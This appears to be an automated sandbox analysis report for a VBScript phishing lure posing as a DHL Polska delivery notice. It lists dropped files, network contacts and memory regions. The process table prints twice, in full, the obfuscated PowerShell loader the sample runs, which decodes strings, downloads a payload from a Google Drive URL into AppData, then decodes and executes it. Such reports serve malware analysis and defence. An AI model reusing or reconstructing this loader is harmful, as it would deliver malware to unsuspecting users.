Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ixx051i.f5s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wisucaoa.tgs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvzfs12a.csj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yofwurij.l4b.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Democratising.Spi
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens
Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses
Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217
Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis
Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture)
{$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For(
$Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195,
$Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge
Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B,
GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e
nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet
I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ
CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen
'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo
At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet
,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo
TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism
(Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo
,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2
, ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw
H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism
($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr
Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF
iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism
(Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo
SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l
ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl
HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa
ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr
trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o
nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism
(Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB
oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en
SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g
(a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS
ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF
t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A
$unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag
ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens
Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses
Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217
Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis
Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture)
{$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For(
$Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195,
$Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge
Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B,
GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e
nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet
I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ
CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen
'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo
At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet
,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo
TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism
(Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo
,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2
, ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw
H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism
($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr
Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF
iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism
(Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo
SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l
ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl
HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa
ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr
trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o
nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism
(Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB
oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en
SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g
(a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS
ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF
t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A
$unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag
ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.goog
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/uc?ex
|
unknown
|
||
|
https://drive.google.com/u
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh8
|
unknown
|
||
|
https://drive.google.
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://drive.goo
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.g
|
unknown
|
||
|
https://drive.google.com/uc
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://drive.googl
|
unknown
|
||
|
https://drive.google.com/uc?e
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.googPB
|
unknown
|
||
|
https://drive.google.c
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/uc?
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.google
|
unknown
|
||
|
https://drive.google.co
|
unknown
|
||
|
http://crl.micros
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.185.174
|
||
|
drive.usercontent.google.com
|
142.250.186.161
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.185.174
|
drive.google.com
|
United States
|
||
|
142.250.186.161
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
607A000
|
trusted library allocation
|
page read and write
|
|
|
|
1D066B48000
|
trusted library allocation
|
page read and write
|
|
|
|
7420000
|
heap
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1974957E000
|
heap
|
page read and write
|
||
|
19749475000
|
heap
|
page read and write
|
||
|
7EEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
2A20EFF000
|
unkown
|
page read and write
|
||
|
19749447000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
342DEFE000
|
stack
|
page read and write
|
||
|
197492B1000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
8902000
|
heap
|
page read and write
|
||
|
1D054EF0000
|
heap
|
page read and write
|
||
|
8B3E000
|
stack
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
85C0000
|
heap
|
page read and write
|
||
|
1D057069000
|
trusted library allocation
|
page read and write
|
||
|
1D055140000
|
heap
|
page read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
1D055180000
|
trusted library allocation
|
page read and write
|
||
|
19747538000
|
heap
|
page read and write
|
||
|
7830000
|
heap
|
page read and write
|
||
|
883C000
|
stack
|
page read and write
|
||
|
197493C1000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1D06F020000
|
heap
|
page read and write
|
||
|
721D000
|
stack
|
page read and write
|
||
|
758A000
|
stack
|
page read and write
|
||
|
1974767E000
|
heap
|
page read and write
|
||
|
DEF000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749440000
|
heap
|
page read and write
|
||
|
88BE000
|
stack
|
page read and write
|
||
|
197498DE000
|
heap
|
page read and write
|
||
|
4AD0000
|
trusted library allocation
|
page read and write
|
||
|
31F1000
|
heap
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
197492D8000
|
heap
|
page read and write
|
||
|
7839000
|
heap
|
page read and write
|
||
|
172BE970000
|
heap
|
page read and write
|
||
|
197492BC000
|
heap
|
page read and write
|
||
|
1D056960000
|
heap
|
page readonly
|
||
|
1D056FB8000
|
trusted library allocation
|
page read and write
|
||
|
1D06F070000
|
heap
|
page execute and read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D056FA4000
|
trusted library allocation
|
page read and write
|
||
|
1D0588E9000
|
trusted library allocation
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
heap
|
page read and write
|
||
|
19749431000
|
heap
|
page read and write
|
||
|
19749431000
|
heap
|
page read and write
|
||
|
8C3E000
|
stack
|
page read and write
|
||
|
1D05700B000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
197492D8000
|
heap
|
page read and write
|
||
|
342EFCD000
|
stack
|
page read and write
|
||
|
1D056F8C000
|
trusted library allocation
|
page read and write
|
||
|
1D055100000
|
heap
|
page read and write
|
||
|
29FE000
|
unkown
|
page read and write
|
||
|
770F000
|
stack
|
page read and write
|
||
|
1D0569F5000
|
heap
|
page read and write
|
||
|
1D06EF42000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
285D000
|
stack
|
page read and write
|
||
|
342DFFE000
|
stack
|
page read and write
|
||
|
4DC0000
|
heap
|
page execute and read and write
|
||
|
342DBCE000
|
stack
|
page read and write
|
||
|
8C7E000
|
stack
|
page read and write
|
||
|
8BA0000
|
trusted library allocation
|
page read and write
|
||
|
72CE000
|
stack
|
page read and write
|
||
|
728B000
|
stack
|
page read and write
|
||
|
197493E8000
|
heap
|
page read and write
|
||
|
197493F2000
|
heap
|
page read and write
|
||
|
1D0551A0000
|
trusted library allocation
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page read and write
|
||
|
19749453000
|
heap
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
1D06F232000
|
heap
|
page read and write
|
||
|
295E000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
4BDF000
|
stack
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D06F030000
|
heap
|
page execute and read and write
|
||
|
79AD000
|
trusted library allocation
|
page read and write
|
||
|
4B12000
|
trusted library allocation
|
page read and write
|
||
|
197494E0000
|
remote allocation
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D06F1F0000
|
heap
|
page read and write
|
||
|
7C1B000
|
stack
|
page read and write
|
||
|
342E0FE000
|
stack
|
page read and write
|
||
|
342F04B000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1974767E000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
342E279000
|
stack
|
page read and write
|
||
|
78A8000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
197494E0000
|
remote allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749550000
|
heap
|
page read and write
|
||
|
31FE000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D056A00000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
heap
|
page read and write
|
||
|
197492C8000
|
heap
|
page read and write
|
||
|
1974764E000
|
heap
|
page read and write
|
||
|
1D0551B5000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
2D3F000
|
unkown
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
172BE950000
|
heap
|
page read and write
|
||
|
1D057365000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
3269000
|
heap
|
page read and write
|
||
|
CD8000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
1D056FCD000
|
trusted library allocation
|
page read and write
|
||
|
1D054F38000
|
heap
|
page read and write
|
||
|
19749447000
|
heap
|
page read and write
|
||
|
197492B1000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
332B000
|
heap
|
page read and write
|
||
|
7741000
|
heap
|
page read and write
|
||
|
7245000
|
heap
|
page execute and read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7410000
|
heap
|
page read and write
|
||
|
4E30000
|
trusted library allocation
|
page read and write
|
||
|
4AE0000
|
trusted library allocation
|
page read and write
|
||
|
7A9F000
|
stack
|
page read and write
|
||
|
7A5E000
|
stack
|
page read and write
|
||
|
197492D0000
|
heap
|
page read and write
|
||
|
172BE920000
|
heap
|
page read and write
|
||
|
4BEA000
|
trusted library allocation
|
page read and write
|
||
|
172BE840000
|
heap
|
page read and write
|
||
|
19749440000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
88FC000
|
stack
|
page read and write
|
||
|
1D054F36000
|
heap
|
page read and write
|
||
|
1D05896B000
|
trusted library allocation
|
page read and write
|
||
|
1D054F44000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1D054F7C000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
19749447000
|
heap
|
page read and write
|
||
|
1974942C000
|
heap
|
page read and write
|
||
|
1974753A000
|
heap
|
